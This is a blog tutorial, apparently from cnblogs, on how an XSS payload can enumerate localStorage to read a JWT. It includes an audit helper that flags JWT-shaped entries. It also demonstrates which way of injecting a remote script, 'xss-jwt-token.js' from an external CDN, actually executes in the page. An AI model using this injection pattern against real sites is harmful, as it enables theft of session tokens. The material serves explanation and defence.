Verifying a web security issue: how XSS steals a token, All In One

XSS reading a JWT token stored in localStorage
// JS: iterate over every localStorage entry (Storage is not iterable, so index with key(i))
for (let i = 0; i < localStorage.length; i++) {
  const key = localStorage.key(i);
  const value = localStorage.getItem(key);
  console.log(`key, value =`, key, value);
}
Iterating over localStorage in JS

// `key` collides with the Storage.key() method name, so DevTools shows it as <value unavailable> 💩
localStorage.setItem(`key`, 'value');
localStorage.setItem(`abc`, 'xyz');
localStorage;
// Storage {abc: 'xyz', length: 2}

// Storage has no iterator, so for...of fails:
for (let item of localStorage) {
  console.log(`localStorage item =`, item);
}
// Uncaught TypeError: localStorage is not iterable ❌
localStorage.length;
// 2
localStorage;
// Storage {abc: 'xyz', length: 2}
//   abc: "xyz"
//   key: <value unavailable>
//   length: 2
//   [[Prototype]]: Storage
localStorage.getItem(`abc`)
// 'xyz'
localStorage.getItem(`key`)
// 'value'
for (let i = 0; i < localStorage.length; i++) {
const key = localStorage.key(i);
console.log(`key, value =`, key, localStorage.getItem(key));
}
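The enumeration above is exactly what an injected script can run, so a developer should know what storage holds before an XSS finds it. The following audit is an added example, not code from the original post: it walks a Storage-compatible object with key(i)/getItem(k) and reports JWT-shaped entries (header alg and payload exp only, never the token). The MemoryStorage class and the sample entries are constructed stand-ins so it runs in Node; in a browser, pass window.localStorage instead.

```javascript
// Minimal in-memory stand-in for the Storage interface (length, key, getItem, setItem).
class MemoryStorage {
  constructor(entries = {}) { this._m = new Map(Object.entries(entries)); }
  get length() { return this._m.size; }
  key(i) { return [...this._m.keys()][i] ?? null; }
  getItem(k) { return this._m.has(k) ? this._m.get(k) : null; }
  setItem(k, v) { this._m.set(k, String(v)); }
}

// Decode one base64url segment into a JSON object, or null if it is not JSON.
function decodeSegment(seg) {
  try {
    const b64 = seg.replace(/-/g, '+').replace(/_/g, '/');
    return JSON.parse(Buffer.from(b64, 'base64').toString('utf8'));
  } catch { return null; }
}

// A value looks like a JWT when it has three base64url parts and the first part
// decodes to a JSON header carrying an "alg" field. No signature check is done here.
function looksLikeJwt(value) {
  if (typeof value !== 'string') return false;
  const parts = value.split('.');
  if (parts.length !== 3 || !parts.every(p => /^[A-Za-z0-9_-]+$/.test(p))) return false;
  const header = decodeSegment(parts[0]);
  return header !== null && typeof header.alg === 'string';
}

// Walk storage by index (Storage is not iterable) and collect JWT-shaped entries.
// Only metadata is returned so the audit output itself does not leak the token.
function auditStorageForJwts(storage) {
  const findings = [];
  for (let i = 0; i < storage.length; i++) {
    const k = storage.key(i);
    const v = storage.getItem(k);
    if (!looksLikeJwt(v)) continue;
    const [h, p] = v.split('.');
    const header = decodeSegment(h);
    const payload = decodeSegment(p) || {};
    findings.push({ key: k, alg: header.alg, exp: payload.exp ?? null });
  }
  return findings;
}

// Constructed sample storage: one HS256 token beside a harmless preference entry.
const sampleHeader = Buffer.from('{"alg":"HS256","typ":"JWT"}').toString('base64url');
const samplePayload = Buffer.from('{"sub":"u1","exp":1700000000}').toString('base64url');
const SAMPLE_STORAGE = new MemoryStorage({
  theme: 'dark',
  access_token: `${sampleHeader}.${samplePayload}.c2lnbmF0dXJl`,
});

console.log(auditStorageForJwts(SAMPLE_STORAGE)); // [{ key: 'access_token', alg: 'HS256', exp: 1700000000 }]
```

A non-empty result means a token that any script running in the page origin can read; moving the session to an HttpOnly cookie takes it out of reach of this enumeration.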
Demos

How to execute a third-party JS link inserted into the page
https://cdn.xgqfrms.xyz/web-security/xss-jwt-token.js
- Inserting a script tag directly as HTML ❌

// ❌ the JS will not execute: script elements inserted via insertAdjacentHTML/innerHTML are not run
document.body.insertAdjacentHTML(`beforeend`, `<script src="https://cdn.xgqfrms.xyz/web-security/xss-jwt-token.js" async></script>`);

// ❌ the JS will not execute
document.body.insertAdjacentHTML(`beforeend`, `<script src="https://cdn.xgqfrms.xyz/js-hacks/drc-drm.js" async></script>`);
- Dynamically creating a script element and inserting it into the DOM ✅

// Variant 1: append first, then set src
const script = document.createElement(`script`);
script.id = `xss`;
document.body.appendChild(script);
// ✅ the JS will execute
script.src = `https://cdn.xgqfrms.xyz/web-security/xss-jwt-token.js`;

// Variant 2: set src first, then append
const script = document.createElement(`script`);
script.id = `xss`;
script.src = `https://cdn.xgqfrms.xyz/web-security/xss-jwt-token.js`;
// ✅ the JS will execute
document.body.appendChild(script);
refs
https://developer.mozilla.org/en-US/docs/Web/API/Window/localStorage
©xgqfrms 2012-2021
First published on cnblogs by xgqfrms, original link: https://www.cnblogs.com/xgqfrms/p/16987826.html